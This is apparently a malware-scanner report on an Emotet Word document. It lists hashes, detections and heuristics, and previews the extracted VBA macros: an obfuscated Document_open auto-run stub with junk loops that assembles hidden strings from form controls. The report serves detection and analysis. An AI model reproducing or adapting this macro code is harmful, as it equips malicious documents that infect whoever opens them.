Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 0b3e7e6492ffc41d…

MALICIOUS

Office (OLE)

Size: 178.9 KB
Created: 2019-12-12 06:49:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 06d2ea1cc033ecff8c5ef6e9dee96a34
SHA-1: 596342f106ff0e1bff91ed1edd2d5f50dd9f85f4
SHA-256: 0b3e7e6492ffc41d9ab4c1d5bd0ab832413cb060171c7c98c8c56b0d7c078e8a
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a strong indicator of malicious intent because the code runs automatically when the document is opened. The ClamAV detection explicitly identifies it as 'Doc.Downloader.Emotet', suggesting its purpose is to download further malicious content. The presence of CreateObject calls within the VBA code further indicates the capability to execute arbitrary code, likely to fetch and run a second-stage payload.

Heuristics 6

  • ClamAV: Doc.Downloader.Emotet-7447388-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7447388-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8795 bytes
SHA-256: e0e3eb9a1480364c8dea8a6196ffcb26c0d93e7a1f7dc790d831f7cc3f008ea7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Lybqoogsdhw"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Cienkxwpvfebq, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Hlnjwdhwyqrgn = Izdprgoelwdy To 0
      For Rbmsryfk = Dhzxckniuilj To 0
         Prtgbnsfu = (23 + Round(WOJOkxR3))
      Next
      Ofowxnxrl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Gqbbivedri = uzH To MZDUoaj1
         Dzfyiuzym = ChrB(dANsZ68a4)
         Next
      For Nezmwunrcvf = 0 To 0
         Eaexbqcy = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Dofkwobhnjs = Rgouokauq To 0
      For Mvnwfqsblwmn = Fdumpvmfolkof To 0
         Utnlmxbbecxq = (23 + Round(WOJOkxR3))
      Next
      Jesxxihg = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Igggbmqk = uzH To MZDUoaj1
         Rdzcezebp = ChrB(dANsZ68a4)
         Next
      For Evcfgrrhgnnl = 0 To 0
         Gqvzrlmn = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Zcwpxanwc = Liictgefpd To 0
      For Zrlckotgbjmrs = Grlfkfcqk To 0
         Aqgapdmgwxmyc = (23 + Round(WOJOkxR3))
      Next
      Nibvqkazyo = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Crxaarlnczatj = uzH To MZDUoaj1
         Wittixbrto = ChrB(dANsZ68a4)
         Next
      For Oaqhmlgjozwl = 0 To 0
         Ufoiimlydre = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Nlllsalbwscg
End Sub

Attribute VB_Name = "Fdktbacaoogfd"
Attribute VB_Base = "0{2CE796BC-315F-490A-A1BF-FE393A0F89CC}{005C3DCB-A0AF-4E3D-AC1A-2CE7964EBA6E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Fuqosmjgrsnid"
Function Ldlexyte()
   For Yxcgphts = Ugjmkcrcfrv To 0
      For Fhzhmcqedog = Eqdxovrbtimgm To 0
         Awqhliwzpahp = (23 + Round(WOJOkxR3))
      Next
      Rsdgmxayhc = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Mmznazryegxy = uzH To MZDUoaj1
         Hqnxhgsqcpj = ChrB(dANsZ68a4)
         Next
      For Nrbpniqv = 0 To 0
         Czhyahkv = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Hvdzmohxgrs = Lybqoogsdhw.Cienkxwpvfebq
   For Nzeyjqdcenou = Blgbziln To 0
      For Htmrhuuokfyl = Gimtbnyrwypi To 0
         Msfaimqpelvks = (23 + Round(WOJOkxR3))
      Next
      Qeqcmvqwsl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Pxncycxbrzyd = uzH To MZDUoaj1
         Qdayrvxi = ChrB(dANsZ68a4)
         Next
      For Ygfbwwnoetbs = 0 To 0
         Xiuyrqgnfi = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Eddiblqzt = Hvdzmohxgrs + Fdktbacaoogfd.Urmsbswtr + Fdktbacaoogfd.Ishapsxghjg + Fdktbacaoogfd.Cfidacdylj
   For Ycgukqwaroiwa = Bdyqmpjywbl To 0
      For Uwjkrwmfpv = Vqjlnxsfqff To 0
         Zgoektzhmfufy = (23 + Round(WOJOkxR3))
      Next
      Whlhgarz = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Idscuprkmr = uzH To MZDUoaj1
         Bfcsijkogpspj = ChrB(dANsZ68a4)
         Next
      For Xsyihorbqhfr = 0 To 0
         Umnnyfgf = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Ekalgrwwelf = Eddiblqzt + Fdktbacaoogfd.Nlnpekfzejxq + Fdktbacaoogfd.Sxvcssgvjusk.ControlTipText
   For Hqlzcifbw = Lydqkxcpq To 0
      For Dxlgrpvp = Emuyewxnleela To 0
         Isysejgh = (23 + Round(WOJOkxR3))
      Next
      Onwrpfhqlgm = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Fafcfvyrxndi = uzH To MZDUoaj1
         Wbmyfplqibwvy = ChrB(dANsZ68a4)
         Next
      For Orqyatrzhalf = 0 To 0
         Zsisjkozihu = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Ldlexyte = Ilysyduuew + Ekalgrwwelf + Ilysyduuew
   For Rfcqhhhvuyu = Nqzijhok To 0

... (truncated)